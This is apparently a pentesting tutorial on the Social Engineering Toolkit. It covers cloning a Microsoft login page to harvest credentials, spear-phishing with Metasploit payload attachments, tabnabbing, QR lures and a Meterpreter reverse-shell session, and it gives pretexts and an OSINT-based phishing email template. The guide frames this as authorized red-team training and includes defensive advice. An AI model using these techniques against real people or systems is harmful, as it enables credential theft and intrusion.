Ethical Hacking #social engineering toolkit#phishing#set

Social Engineering Toolkit (SET) Tutorial for Pentesters

Learn to use the Social Engineering Toolkit (SET) for authorized phishing simulations, credential harvesting, and spear-phishing campaigns.

7 min read

The Social Engineering Toolkit (SET) is an open-source Python framework designed specifically for social engineering attacks during authorized penetration tests. Created by TrustedSec’s Dave Kennedy, SET automates the creation of phishing pages, spear-phishing emails, credential harvesters, and malicious payloads — turning what used to be multi-hour manual setups into a matter of minutes. This guide covers the most practical SET attack vectors for authorized security assessments.

Important: SET is only legal to use on systems and users you have explicit written authorization to test. Unauthorized phishing, credential harvesting, or malware deployment is a serious criminal offense. Always obtain signed authorization before any engagement.

Installing SET

SET comes pre-installed on Kali Linux and Parrot OS. To install on other systems:

git clone https://github.com/trustedsec/social-engineer-toolkit
cd social-engineer-toolkit
pip install -r requirements.txt
sudo python setup.py

Launch SET:

sudo setoolkit

Or simply:

sudo se-toolkit

You are greeted with a numbered menu system:

 Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

The SET Configuration File

Before running any attack, review and configure SET’s options:

sudo nano /etc/setoolkit/set.config

Key settings:

# Your attacking IP or hostname
METASPLOIT_PATH=/usr/share/metasploit-framework
AUTO_BLACKOUT=OFF
HARVESTER_LOG=/var/www/
APACHE_SERVER=ON

If you plan to use the Apache-based credential harvester, ensure Apache is running:

sudo systemctl start apache2

Attack Vector 1: Credential Harvester

The Credential Harvester clones a legitimate website and captures any credentials entered into the fake login form. This is the most common SET attack vector in authorized phishing assessments.

Navigation path:

1) Social-Engineering Attacks
→ 2) Website Attack Vectors
→ 3) Credential Harvester Attack Method
→ 2) Site Cloner

Step-by-step walkthrough:

  1. Select option 1 (Social-Engineering Attacks) from the main menu
  2. Select option 2 (Website Attack Vectors)
  3. Select option 3 (Credential Harvester Attack Method)
  4. Select option 2 (Site Cloner)

SET will ask for your IP address (for the POST back):

Enter the IP address for POST back in Harvester/Tabnabbing: 192.168.1.100
Enter the url to clone: https://login.microsoft.com

SET clones the login page and starts a web server. Any credentials entered on the fake page are captured and displayed in your terminal:

[*] Credential Harvester is now listening...
[*] We captured credentials:
Username: user@company.com
Password: Sup3rS3cur3!

Delivering the link: In an authorized assessment, you would email this URL (e.g., http://192.168.1.100) to the target users after disguising it with a custom domain or URL shortener per your rules of engagement.

Attack Vector 2: Spear-Phishing Email Campaign

SET can compose and send targeted phishing emails with malicious attachments or links directly from its interface.

Navigation path:

1) Social-Engineering Attacks
→ 1) Spear-Phishing Attack Vectors
→ 1) Perform a Mass Email Attack

Steps:

  1. Select the payload type (SET integrates with Metasploit to generate payloads)
  2. Choose a file format for the attachment (PDF, Office document, etc.)
  3. Configure your SMTP relay or use the built-in mailer

Using a custom SMTP relay (recommended for deliverability):

When prompted, choose option 2 (your own SMTP server). Configure with your authorized mail relay:

FROM Email Address: it-helpdesk@company-internal.com
TO Email Address: target@company.com
Subject: Action Required: VPN Certificate Renewal

SET will format and send the email with your configured payload attached.

Attack Vector 3: The Phishing Page with Tabnabbing

Tabnabbing is a more sophisticated technique — the malicious page looks normal at first, but when the user switches tabs and returns, it silently replaces itself with a fake login page:

1) Social-Engineering Attacks
→ 2) Website Attack Vectors
→ 3) Credential Harvester Attack Method
→ 3) Tabnabbing Attack Method

Configure exactly as with the site cloner — provide the page to clone and your listener IP.

Attack Vector 4: Multi-Attack Web Vector

Combines a web server hosting multiple payloads (Java applet, browser exploit, credential harvester) into one landing page:

1) Social-Engineering Attacks
→ 2) Website Attack Vectors
→ 1) Java Applet Attack Method

This approach serves multiple exploit vectors from one URL, increasing the chance of success against diverse browser environments.

Attack Vector 5: QRCode Attack Vector

Generate a QR code that points to your malicious page — useful for physical social engineering scenarios (printing and leaving QR codes in offices):

1) Social-Engineering Attacks
→ 9) QRCode Generator Attack Vector

Enter the URL of your credential harvester or phishing page, and SET generates a printable QR code image.

Integrating SET with Metasploit

SET’s most powerful feature is its deep Metasploit integration — it can generate reverse shell payloads and set up multi-handler listeners automatically:

1) Social-Engineering Attacks
→ 1) Spear-Phishing Attack Vectors
→ 1) Perform a Mass Email Attack
→ 1) File Format Exploits
→ (Select a payload, e.g., PDF Adobe util.printf())

SET calls Metasploit to generate the payload, wraps it in the chosen document format, and starts a listener:

[*] Sending payload to Metasploit...
[*] Payload delivered
[*] Starting the listener...
msf exploit(handler) > 
[*] Meterpreter session 1 opened (192.168.1.100:4444 192.168.1.50:51234)

Building a Realistic Phishing Pretext

Technical setup is only half the battle. The pretext — the story you build around the phishing email — determines success. Effective authorized phishing campaign pretexts include:

PretextWhy It Works
IT helpdesk password resetCreates urgency; everyone uses IT
VPN client update requiredImplies security risk if ignored
Benefits enrollment deadlineTime pressure + personal relevance
Package delivery notificationHigh volume; people expect them
CEO/executive messageAuthority-based compliance
DocuSign signature requestCommon in business workflows

Spear-phishing narrows the pretext to a specific individual using OSINT gathered about them:

Hi [Name],

Following up on your recent support ticket #[Real Ticket Number] regarding 
your Salesforce access issue. Please click the link below to verify your 
credentials and restore access before end of business today.

The inclusion of real details (ticket numbers from OSINT, manager’s name, project names from LinkedIn) dramatically increases click-through rates in authorized assessments.

Measuring Campaign Results

For authorized phishing simulations, tracking metrics helps the client understand their exposure:

MetricDescription
Delivery rate% of emails that reached inboxes
Open rate% of recipients who opened the email
Click rate% who clicked the link
Credential submission rate% who entered credentials
Report rate% who reported it to IT security

SET logs credential captures in real time. For full campaign tracking, consider using a dedicated phishing platform like GoPhish (covered separately) alongside SET for payload generation.

Defending Against SET-Style Attacks

Understanding SET’s techniques helps defenders configure better controls:

  • Email filtering: Configure SPF, DKIM, and DMARC; enable sandboxed attachment scanning
  • Security awareness training: Run regular simulated phishing to train employees to recognize and report suspicious emails
  • MFA everywhere: Even captured credentials are useless if MFA is enforced
  • DNS filtering: Block known phishing infrastructure at the DNS layer
  • Browser isolation: Remote browser isolation prevents malicious page execution
  • Incident response playbook: Ensure employees know exactly who to notify when they suspect a phishing attempt

Summary

The Social Engineering Toolkit remains one of the most comprehensive platforms for simulating real-world social engineering attacks in authorized red team engagements. Its credential harvester, spear-phishing capabilities, and Metasploit integration give security professionals the tools to realistically test an organization’s human and technical defenses. Always pair SET campaigns with proper authorization documentation, defined scope, and a debrief session to help the organization understand and remediate their exposure.

#pentesting #set #phishing #social engineering toolkit

// related articles

ethical-hacking FFUF Web Fuzzing Complete Guide for Pentesters 7 min read ethical-hacking Gobuster Directory & DNS Brute-Forcing Tutorial 7 min read ethical-hacking Hashcat GPU Password Cracking Complete Guide 7 min read